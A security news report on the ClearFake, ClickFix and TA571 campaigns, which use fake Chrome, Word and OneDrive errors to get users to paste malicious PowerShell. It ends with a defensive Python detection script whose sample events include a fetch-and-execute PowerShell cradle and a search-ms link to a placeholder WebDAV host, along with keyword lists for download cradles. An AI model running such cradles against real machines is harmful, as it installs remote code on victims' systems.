Fake Chrome Errors Used to Launch PowerShell Scripts
Malware distributors are using fake error messages from Google Chrome, Word, and OneDrive to trick users into running “patches” that are actually PowerShell scripts installing malicious software. Experts at Proofpoint report that this new tactic has already been adopted by several hacker groups. These attacks are being used by the operators behind the ClearFake scheme, a new malware cluster called ClickFix, and the TA571 group, which is known for spreading spam and distributing emails that lead to malware and ransomware infections.
Previously, ClearFake attacks involved injecting malicious code into compromised legitimate websites, which then displayed fake browser update messages. The new attacks likewise rely on JavaScript injected into the HTML of hacked sites, but the overlays now show users fake error messages from Google Chrome, Microsoft Word, and OneDrive. These messages prompt users to copy a “fix” to their clipboard and then paste and run it manually.
“Although a successful attack requires significant user interaction, the social engineering is sophisticated enough to present both the problem and the solution at the same time, which can prompt users to act without assessing the risks,” specialists warn.
Payloads observed by Proofpoint in this campaign include DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, clipboard-hijacking malware, and the Lumma stealer.
Three Attack Chains Identified
Analysts have identified three attack chains that differ mainly in their initial stages; only one of them cannot be confidently attributed to the TA571 group mentioned above.
- First Chain (ClearFake): Users visit a compromised website that loads a malicious script hosted on the blockchain via Binance Smart Chain. This script performs several checks and displays a fake notification, supposedly from Google Chrome, about a problem displaying the web page. The dialog then suggests installing a “root certificate” by copying a PowerShell script to the clipboard and running it in Windows PowerShell. After execution, the script checks if the device is a suitable target and then downloads additional payloads.
- Second Chain (ClickFix): This campaign uses code injected into hacked sites to create an iframe overlay with fake error messages. Users are prompted to open “Windows PowerShell (Admin)” and paste the provided code, leading to the same consequences as the first chain.
- Third Chain (Email/HTML Attachments): This method involves emails with HTML attachments resembling Microsoft Word documents. Users are prompted to install the Word Online extension to view the document properly. The fake error message offers “How to fix” and “Auto-fix” options. Choosing “How to fix” copies a base64-encoded PowerShell command to the clipboard and instructs the user to paste it into PowerShell. The “Auto-fix” option uses the search-ms protocol to display a fix.msi or fix.vbs file hosted on a remote, hacker-controlled resource via WebDAV. PowerShell commands are then loaded and executed through either the MSI file or the VBS script, resulting in infection with Matanbuchus and DarkGate.
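As an added example (not from Proofpoint's report or this article), the following Python triages constructed process-creation events for the indicators the three chains share: a PowerShell `-EncodedCommand` that hides a download cradle, PowerShell spawned by the script host that runs fix.vbs or fix.msi, and a search-ms URI pointed at a remote share. The event fields, hostnames and rule names are assumptions; the decoded command is shown to the analyst so the pasted “fix” can be read.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")

# Constructed process-creation events (parent image, image, command line); not real telemetry.
# The encoded sample is built at runtime so its base64 is guaranteed to decode.
SAMPLE_EVENTS = [
    # Chains 1/2: the pasted "fix" runs in a PowerShell window the user opened from the desktop
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -w hidden -enc "
     + encode_ps("Invoke-WebRequest http://example.invalid/fix | Invoke-Expression")),
    # Chain 3 "Auto-fix": a search-ms view onto a remote WebDAV share (placeholder hostname)
    ("msedge.exe", "explorer.exe",
     'explorer.exe "search-ms:query=fix&crumb=location:\\\\dav.example.invalid@80\\DavWWWRoot"'),
    # Chain 3: fix.vbs from that share spawns PowerShell
    ("wscript.exe", "powershell.exe", "powershell.exe -ep bypass -c Write-Output ok"),
    # Benign: an administrator runs a local script from a console
    ("cmd.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\inventory.ps1"),
]

ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE_HINTS = ("invoke-expression", "iex", "downloadstring", "invoke-webrequest", "iwr")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "msiexec.exe", "mshta.exe"}

def analyze(parent: str, image: str, cmdline: str) -> list:
    """Return the names of the rules an event triggers; an empty list means nothing notable."""
    hits, parent, image, low = [], parent.lower(), image.lower(), cmdline.lower()
    if image == "powershell.exe":
        m = ENC_RE.search(cmdline)
        if m:
            hits.append("encoded_command")
            try:  # decode so the analyst sees what the user actually pasted
                decoded = base64.b64decode(m.group(1)).decode("utf-16le", "ignore").lower()
            except ValueError:
                decoded = ""
            if any(h in decoded for h in CRADLE_HINTS):
                hits.append("encoded_download_cradle")
        if parent in SCRIPT_HOSTS:
            hits.append("powershell_from_script_host")  # fix.vbs / fix.msi stage of chain 3
    if "search-ms:" in low and re.search(r"crumb=location:\\\\", low):
        hits.append("search_ms_remote_location")  # search-ms pointed at a UNC/WebDAV path
    return hits

def triage(events=SAMPLE_EVENTS) -> dict:
    """Map each flagged command line to its rule hits; events with no hits are dropped."""
    return {c: analyze(p, i, c) for p, i, c in events if analyze(p, i, c)}
```

Calling `triage()` on the samples flags three of the four events and leaves the console-launched inventory script alone.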